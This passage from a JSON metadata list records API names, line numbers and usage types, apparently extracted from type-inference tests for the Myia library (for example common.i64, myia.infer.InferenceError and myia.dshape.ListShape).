"common.f64", "line_number": 340, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 340, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 341, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 341, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 345, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 345, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 345, "usage_type": "name"}, {"api_name": "common.B", "line_number": 350, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 350, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 
370, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 371, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 371, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 372, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 373, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 377, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 390, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 390, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 391, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 391, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 391, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 392, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 392, "usage_type": "name"}, {"api_name": "common.T", "line_number": 393, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 393, "usage_type": "name"}, {"api_name": "common.T", "line_number": 394, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 394, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 394, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 394, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 404, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 404, "usage_type": "name"}, {"api_name": "common.T", "line_number": 404, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_mul", "line_number": 418, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 415, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 415, "usage_type": "name"}, {"api_name": "common.T", "line_number": 415, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_mul", "line_number": 425, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 423, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 423, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_mul", "line_number": 430, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 428, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 428, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 433, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 433, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 440, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 440, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 447, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 447, "usage_type": "name"}, {"api_name": "common.T", "line_number": 447, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 448, "usage_type": "argument"}, {"api_name": "common.f64", "line_number": 448, "usage_type": "argument"}, {"api_name": "myia.dshape.TupleShape", "line_number": 448, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 448, "usage_type": "name"}, {"api_name": "common.T", "line_number": 449, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 449, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 449, "usage_type": "argument"}, {"api_name": "myia.dshape.TupleShape", "line_number": 450, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 450, "usage_type": 
"name"}, {"api_name": "common.i64", "line_number": 455, "usage_type": "name"}, {"api_name": "common.L", "line_number": 455, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 456, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 456, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 456, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 457, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 457, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 458, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 458, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 459, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 459, "usage_type": "argument"}, {"api_name": "common.L", "line_number": 460, "usage_type": "name"}, {"api_name": "myia.dtype.Array", "line_number": 460, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 460, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 460, "usage_type": "call"}, {"api_name": "common.L", "line_number": 461, "usage_type": "name"}, {"api_name": "myia.dtype.Array", "line_number": 461, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 461, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 461, "usage_type": "call"}, {"api_name": "myia.dshape.ListShape", "line_number": 462, "usage_type": "call"}, {"api_name": "myia.infer.ANYTHING", "line_number": 462, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 463, "usage_type": "call"}, {"api_name": "myia.dshape.ListShape", "line_number": 464, "usage_type": "call"}, {"api_name": "myia.infer.ANYTHING", "line_number": 464, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 469, "usage_type": "name"}, {"api_name": "common.L", "line_number": 469, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 470, "usage_type": "name"}, {"api_name": "common.L", "line_number": 470, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 471, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 471, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 472, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 472, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 472, "usage_type": "name"}, {"api_name": "common.L", "line_number": 477, "usage_type": "name"}, {"api_name": "myia.dtype.Problem", "line_number": 477, "usage_type": "name"}, {"api_name": "myia.infer.VOID", "line_number": 477, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 478, "usage_type": "name"}, {"api_name": "myia.prim.ops.tuple_len", "line_number": 497, "usage_type": "call"}, {"api_name": "myia.prim.ops", "line_number": 497, "usage_type": "name"}, {"api_name": "common.T", "line_number": 485, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 485, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 485, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 486, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 486, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 487, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 488, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 488, "usage_type": "name"}, 
{"api_name": "myia.prim.ops.list_len", "line_number": 509, "usage_type": "call"}, {"api_name": "myia.prim.ops", "line_number": 509, "usage_type": "name"}, {"api_name": "common.T", "line_number": 502, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 502, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 502, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 502, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 503, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 503, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 504, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 505, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 505, "usage_type": "name"}, {"api_name": "myia.prim.ops.array_len", "line_number": 521, "usage_type": "call"}, {"api_name": "myia.prim.ops", "line_number": 521, "usage_type": "name"}, {"api_name": "common.T", "line_number": 514, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 514, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 514, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 514, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 515, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 515, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 516, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 517, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 517, "usage_type": "name"}, {"api_name": "myia.composite.tail", "line_number": 532, "usage_type": "call"}, {"api_name": "common.T", "line_number": 524, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 524, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 524, "usage_type": "name"}, {"api_name": "common.T", "line_number": 525, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 525, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 525, "usage_type": "name"}, {"api_name": "common.T", "line_number": 526, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 526, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 527, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 527, "usage_type": "name"}, {"api_name": "common.T", "line_number": 528, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 528, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 528, "usage_type": "name"}, {"api_name": "myia.dshape.TupleShape", "line_number": 528, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 528, "usage_type": "name"}, {"api_name": "common.T", "line_number": 529, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 529, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 529, "usage_type": "name"}, {"api_name": "myia.dshape.TupleShape", "line_number": 530, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 530, "usage_type": "name"}, {"api_name": "myia.composite.tail", "line_number": 537, "usage_type": "call"}, {"api_name": "common.T", "line_number": 535, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 535, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 535, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 535, 
"usage_type": "name"}, {"api_name": "common.i64", "line_number": 540, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 540, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 541, "usage_type": "argument"}, {"api_name": "common.f64", "line_number": 541, "usage_type": "argument"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 541, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 546, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 546, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 551, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 551, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 551, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 556, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 556, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 556, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 563, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 563, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 564, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 564, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 564, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 565, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 565, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 565, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 566, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 566, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 566, "usage_type": "name"}, {"api_name": "common.T", "line_number": 567, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 567, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 567, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 567, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.tuple_setitem", "line_number": 584, "usage_type": "call"}, {"api_name": "common.T", "line_number": 576, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 576, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 576, "usage_type": "name"}, {"api_name": "common.T", "line_number": 577, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 577, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 577, "usage_type": "name"}, {"api_name": "common.T", "line_number": 578, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 578, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 578, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 578, "usage_type": "name"}, {"api_name": "common.T", "line_number": 579, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 579, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 579, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 579, "usage_type": "name"}, {"api_name": "common.T", "line_number": 580, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 580, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 580, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 580, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.list_setitem", "line_number": 595, 
"usage_type": "call"}, {"api_name": "common.li64", "line_number": 589, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 589, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 590, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 590, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 590, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 590, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 591, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 591, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 591, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 591, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 598, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 598, "usage_type": "name"}, {"api_name": "common.T", "line_number": 598, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 614, "usage_type": "name"}, {"api_name": "common.T", "line_number": 614, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 615, "usage_type": "name"}, {"api_name": "common.T", "line_number": 615, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 616, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 616, "usage_type": "name"}, {"api_name": "common.T", "line_number": 616, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 617, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 617, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 617, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 618, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 618, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 618, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 629, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 629, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 653, "usage_type": "name"}, {"api_name": "common.B", "line_number": 653, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 653, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 658, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 658, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 681, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_mul", "line_number": 683, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 673, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 674, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 674, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 699, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_lt", "line_number": 701, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 690, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 690, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 691, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 692, "usage_type": "name"}, {"api_name": "common.B", "line_number": 692, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 708, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 708, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 
709, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 710, "usage_type": "name"}, {"api_name": "common.B", "line_number": 710, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 732, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 733, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 733, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 736, "usage_type": "argument"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 736, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 758, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.identity", "line_number": 809, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 777, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 778, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 778, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 778, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 783, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 783, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 816, "usage_type": "name"}, {"api_name": "common.T", "line_number": 816, "usage_type": "name"}, {"api_name": "common.B", "line_number": 816, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 835, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 835, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 836, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 837, "usage_type": "name"}, {"api_name": "common.T", "line_number": 837, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_usub", "line_number": 890, "usage_type": "name"}, {"api_name": "common.B", "line_number": 863, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 863, "usage_type": "name"}, {"api_name": "common.B", "line_number": 864, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 864, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 864, "usage_type": "name"}, {"api_name": "common.B", "line_number": 865, "usage_type": "name"}, {"api_name": "common.Nil", "line_number": 865, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 865, "usage_type": "name"}, {"api_name": "common.B", "line_number": 866, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 866, "usage_type": "name"}, {"api_name": "common.B", "line_number": 867, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 867, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 867, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 867, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 899, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 913, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 913, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 929, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 930, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 946, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 957, "usage_type": "name"}, {"api_name": "common.B", "line_number": 975, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 975, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 975, "usage_type": "name"}, {"api_name": 
"myia.prim.py_implementations.list_map", "line_number": 1000, "usage_type": "call"}, {"api_name": "common.li64", "line_number": 991, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 991, "usage_type": "name"}, {"api_name": "common.T", "line_number": 991, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 992, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 992, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 992, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.list_map", "line_number": 1014, "usage_type": "call"}, {"api_name": "common.li64", "line_number": 1005, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 1006, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1006, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1006, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1023, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1023, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1018, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1018, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1019, "usage_type": "argument"}, {"api_name": "common.f64", "line_number": 1020, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1045, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1028, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1028, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1029, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1029, "usage_type": "name"}, {"api_name": "myia.dtype.Int", "line_number": 1029, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1029, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1032, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1032, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1033, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1033, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1033, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1034, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1034, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1035, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1035, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1036, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1036, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1037, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1037, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1038, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1038, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1038, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1039, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1039, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1039, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1040, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1040, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", 
"line_number": 1040, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1041, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1041, "usage_type": "name"}, {"api_name": "myia.dtype.Number", "line_number": 1041, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.typeof", "line_number": 1054, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1049, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1049, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1050, "usage_type": "argument"}, {"api_name": "common.f64", "line_number": 1051, "usage_type": "argument"}, {"api_name": "common.T", "line_number": 1057, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1057, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1088, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1088, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1090, "usage_type": "call"}, {"api_name": "common.f64", "line_number": 1090, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1092, "usage_type": "call"}, {"api_name": "common.ai64", "line_number": 1092, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1094, "usage_type": "call"}, {"api_name": "common.Point_t", "line_number": 1094, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1096, "usage_type": "call"}, {"api_name": "common.Nil", "line_number": 1096, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1098, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1100, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1100, "usage_type": "argument"}, {"api_name": "myia.composite.tail", "line_number": 1101, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1102, "usage_type": "call"}, {"api_name": "common.L", "line_number": 1102, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1104, "usage_type": "call"}, {"api_name": "common.Thing_ftup", "line_number": 1104, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1062, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1063, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1063, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1064, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1065, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1066, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1066, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1067, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1067, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1067, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1069, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1069, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1069, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 1070, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1070, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1071, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1071, 
"usage_type": "name"}, {"api_name": "common.li64", "line_number": 1071, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1072, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1072, "usage_type": "name"}, {"api_name": "common.Point3D_t", "line_number": 1073, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1073, "usage_type": "name"}, {"api_name": "common.Thing_ftup", "line_number": 1074, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1074, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1074, "usage_type": "name"}, {"api_name": "common.Thing_f", "line_number": 1075, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1075, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1081, "usage_type": "call"}, {"api_name": "common.Point3D", "line_number": 1082, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.list_map", "line_number": 1129, "usage_type": "call"}, {"api_name": "common.li64", "line_number": 1114, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1114, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1115, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1115, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1115, "usage_type": "name"}, {"api_name": "common.L", "line_number": 1116, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1116, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 1116, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1116, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 1118, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1118, "usage_type": "argument"}, {"api_name": "myia.dshape.ListShape", "line_number": 1118, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 1118, "usage_type": "argument"}, {"api_name": "common.L", "line_number": 1119, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1119, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 1119, "usage_type": "call"}, {"api_name": "myia.dshape.ListShape", "line_number": 1120, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1136, "usage_type": "name"}, {"api_name": "operator.add", "line_number": 1142, "usage_type": "attribute"}, {"api_name": "operator.mul", "line_number": 1143, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 1148, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1153, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1153, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1154, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1154, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1154, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1169, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1169, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1170, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1170, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1170, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1193, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1194, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1194, "usage_type": "name"}, 
